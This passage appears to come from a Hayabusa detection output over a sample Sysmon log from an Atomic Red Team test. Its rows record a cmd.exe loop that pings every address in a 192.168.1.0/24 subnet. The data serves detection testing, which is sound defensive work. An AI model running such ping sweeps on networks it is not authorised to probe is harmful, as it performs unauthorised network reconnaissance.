192.168.1.185 | 
Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D953-5D31-0000-0010EFAE3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:07.533 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.186 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-D953-5D31-0000-0010B7B73600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:07.912 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.187 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1880 | PGUID: 747F3D96-D953-5D31-0000-0010A3BA3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:08.521 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.188 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6172 | PGUID: 747F3D96-D954-5D31-0000-00108FBD3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:09.043 +00:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ping -n 1 -w 100 192.168.1.189 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4464 | PGUID: 747F3D96-D955-5D31-0000-0010D6C03600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:09.515 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.190 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 684 | PGUID: 747F3D96-D955-5D31-0000-0010C2C33600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:10.036 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.191 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 504 | PGUID: 747F3D96-D956-5D31-0000-0010AEC63600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:10.556 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.192 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6608 | PGUID: 747F3D96-D956-5D31-0000-00109AC93600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:11.022 
+00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.193 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1128 | PGUID: 747F3D96-D957-5D31-0000-001086CC3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:11.504 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.194 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1104 | PGUID: 747F3D96-D957-5D31-0000-001072CF3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:12.040 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.195 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5244 | PGUID: 747F3D96-D958-5D31-0000-00105ED23600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:12.537 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.196 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4460 | PGUID: 
747F3D96-D958-5D31-0000-001026DB3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:13.022 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.197 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3352 | PGUID: 747F3D96-D959-5D31-0000-001016DE3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:13.509 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.198 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1136 | PGUID: 747F3D96-D959-5D31-0000-001007E13600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:14.020 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.199 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 936 | PGUID: 747F3D96-D95A-5D31-0000-0010F7E33600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:14.513 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.200 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" 
| LID: 0x50951 | PID: 4480 | PGUID: 747F3D96-D95A-5D31-0000-0010EBE63600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:15.001 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.201 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6464 | PGUID: 747F3D96-D95A-5D31-0000-0010DBE93600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:15.518 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.202 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2392 | PGUID: 747F3D96-D95B-5D31-0000-0010CCEC3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:16.026 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.203 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2624 | PGUID: 747F3D96-D95C-5D31-0000-001039F03600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:16.521 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.204 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in 
(1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6804 | PGUID: 747F3D96-D95C-5D31-0000-0010F7F53600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:17.037 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.205 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 884 | PGUID: 747F3D96-D95D-5D31-0000-001001F93600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:17.438 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.206 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5828 | PGUID: 747F3D96-D95D-5D31-0000-0010C8013700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:18.043 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.207 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3436 | PGUID: 747F3D96-D95E-5D31-0000-0010B5043700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:18.544 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.208 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6296 | PGUID: 747F3D96-D95E-5D31-0000-0010A1073700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:19.012 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.209 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4660 | PGUID: 747F3D96-D95F-5D31-0000-0010930A3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:19.546 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.210 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6184 | PGUID: 747F3D96-D95F-5D31-0000-00107F0D3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:20.009 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.211 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3932 | PGUID: 747F3D96-D960-5D31-0000-00106B103700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:20.571 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.212 | Process: C:\Windows\System32\PING.EXE | 
User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 980 | PGUID: 747F3D96-D960-5D31-0000-001057133700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:21.020 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.213 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4944 | PGUID: 747F3D96-D961-5D31-0000-0010891F3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:21.520 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.214 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2892 | PGUID: 747F3D96-D961-5D31-0000-001075223700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:22.035 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.215 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7164 | PGUID: 747F3D96-D962-5D31-0000-001061253700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:22.520 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.216 | 
Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5124 | PGUID: 747F3D96-D962-5D31-0000-0010292E3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:23.011 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.217 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1996 | PGUID: 747F3D96-D963-5D31-0000-001016313700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:23.546 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.218 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2884 | PGUID: 747F3D96-D963-5D31-0000-001002343700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:23.993 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.219 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3896 | PGUID: 747F3D96-D963-5D31-0000-0010EF363700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:24.504 +00:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ping -n 1 -w 100 192.168.1.220 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6856 | PGUID: 747F3D96-D964-5D31-0000-0010DB393700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:25.008 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.221 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4932 | PGUID: 747F3D96-D965-5D31-0000-0010C73C3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:25.544 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.222 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1220 | PGUID: 747F3D96-D965-5D31-0000-0010B53F3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:26.004 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.223 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5792 | PGUID: 747F3D96-D965-5D31-0000-0010A1423700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 
14:53:26.430 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.224 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5656 | PGUID: 747F3D96-D966-5D31-0000-00108D453700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:27.009 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.225 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6632 | PGUID: 747F3D96-D967-5D31-0000-00107C483700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:27.555 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.226 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5844 | PGUID: 747F3D96-D967-5D31-0000-0010BB513700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:28.035 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.227 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6396 | PGUID: 
747F3D96-D968-5D31-0000-001001553700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:28.511 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.228 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1452 | PGUID: 747F3D96-D968-5D31-0000-0010F3573700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:29.009 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.229 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 112 | PGUID: 747F3D96-D969-5D31-0000-0010DF5A3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:29.534 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.230 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4004 | PGUID: 747F3D96-D969-5D31-0000-0010CB5D3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:30.034 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.231 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" 
